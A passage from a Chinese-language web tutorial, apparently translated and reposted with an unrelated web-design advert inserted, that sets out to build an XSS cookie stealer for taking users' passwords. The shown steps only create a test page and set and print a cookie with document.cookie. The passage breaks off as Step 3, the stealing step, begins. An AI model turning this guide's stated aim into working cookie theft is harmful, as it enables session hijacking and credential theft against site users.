JS寫XSScookiestealer來竊取密碼的步驟詳解

JavaScript是web中最常用的腳本開發(fā)語言，js可以自動執(zhí)行站點組件，管理站點內(nèi)容，在web業(yè)內(nèi)實現(xiàn)其他有用的函數(shù)。JS可以有很多的函數(shù)可以用做惡意用途，包括竊取含有密碼等內(nèi)容的用戶cookie。

創(chuàng)新互聯(lián)是一家集網(wǎng)站建設(shè),石樓企業(yè)網(wǎng)站建設(shè),石樓品牌網(wǎng)站建設(shè),網(wǎng)站定制,石樓網(wǎng)站建設(shè)報價,網(wǎng)絡(luò)營銷,網(wǎng)絡(luò)優(yōu)化,石樓網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè)，幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強企業(yè)競爭力?？沙浞譂M足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時我們時刻保持專業(yè)、時尚、前沿，時刻以成就客戶成長自我，堅持不斷學(xué)習(xí)、思考、沉淀、凈化自己，讓我們?yōu)楦嗟钠髽I(yè)打造出實用型網(wǎng)站。

Cookie是站點請求和保持特定訪問頁面的信息。Cookie含有訪問的方式、時間、用戶名密碼等認(rèn)證信息等。當(dāng)用戶訪問給定站點時，必須使用cookie；如果攻擊者可以攔截cookie，就可以利用cookie竊取用戶的一些信息。對某個特定的域名，使用JS可以保存或修改用戶的cookie。也就是說，如果攻擊者可以利用JS查看、修改cookie，那么這可以變成一種有價值的黑客技術(shù)。

基于JS的攻擊可以有效地與代碼注入等技術(shù)相結(jié)合，這可能造成惡意代碼在可信的網(wǎng)站上執(zhí)行。

下面開始創(chuàng)建XSS cookie stealer

Step 1: 創(chuàng)建 HTML Test 頁

首先，創(chuàng)建一個標(biāo)準(zhǔn)的HTML頁

mkdir cookiestealer
cd cookiestealer
touch index.html

然后，編輯index.html

nano index.html
<html>
<body>
</body>
</html>

測試頁面

Step 2: 創(chuàng)建Cookie

創(chuàng)建一個可以插入到cookie中的基本參數(shù)——字符串。這個cookie只能用于本頁面中，同樣的，之后的注入也應(yīng)用于該頁面保存的所有cookie。

 <script type="text/javascript">document.cookie = "username=Null Byte";</script>

該腳本要插入到HTML的<body>部分，如下：

如果運行該腳本的頁面打開了，那么就會設(shè)定cookie，但是瀏覽器中不會顯示任何東西。我們可以用document.write函數(shù)直接查看cookie。

document.write(document.cookie);

同樣功能的腳本如下：

 <script type="text/javascript">
 document.cookie = "username=Null Byte";
 document.write(document.cookie);
 </script>

在瀏覽器中打開頁面，就會出現(xiàn)如下的cookie信息：

說明我們成功地為這個頁面設(shè)置了"username=Null Byte" 的cookie。

Step 3: 用js腳本竊取Cookies

我們用來傳遞cookies到